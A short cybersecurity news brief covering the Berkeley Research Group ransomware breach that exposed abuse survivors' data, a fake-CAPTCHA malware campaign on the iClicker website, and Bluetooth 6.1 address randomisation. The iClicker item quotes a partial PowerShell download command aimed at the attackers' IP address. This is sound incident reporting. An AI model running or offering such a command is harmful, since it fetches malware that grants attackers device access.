Svoboda Cybersecurity Brief May 12, 2025
May 12, 2025bulletproof VPN - stay anonymous
Data breach exposes Catholic clergy abuse survivors’ information
The Berkeley Research Group (BRG) suffered a ransomware attack on March 2, 2025, potentially exposing sensitive data of diocesan sex abuse survivors involved in bankruptcy lawsuits. Attackers gained access via Microsoft Teams phishing, deployed Chaos ransomware, and were paid an undisclosed ransom despite providing a “destruction log.” The Department of Justice criticized BRG’s delayed notification to affected parties, with some clients only informed on April 28.
Source: DataBreaches
iClicker website compromised to distribute malware via fake CAPTCHA
Between April 12-16, 2025, the iClicker student engagement platform’s website was hacked to display a fake CAPTCHA prompting users to execute a PowerShell script (iwr http://67.217.228[.]14:8080
). The script delivered malware granting attackers full device access, though some users received a legitimate Microsoft Visual C++ Redistributable as a decoy. iClicker downplayed the incident and obscured its security bulletin with a noindex
tag.
Impact: Compromised devices risk credential theft, ransomware, and further network breaches.
Mitigation: Affected users should run security scans, change all passwords, and use a password manager.
Source: BleepingComputer
Bluetooth 6.1 introduces randomized RPA timing to enhance privacy
Bluetooth SIG’s Core Specification 6.1 adds randomized Resolvable Private Address (RPA) updates (8-15 mins by default) to mitigate correlation attacks. The update also improves power efficiency by allowing controllers to handle RPA generation autonomously. Hardware adoption is expected by 2026, with full feature rollout likely delayed.
Source: BleepingComputer
Share this brief: https://svo.bz/Ias7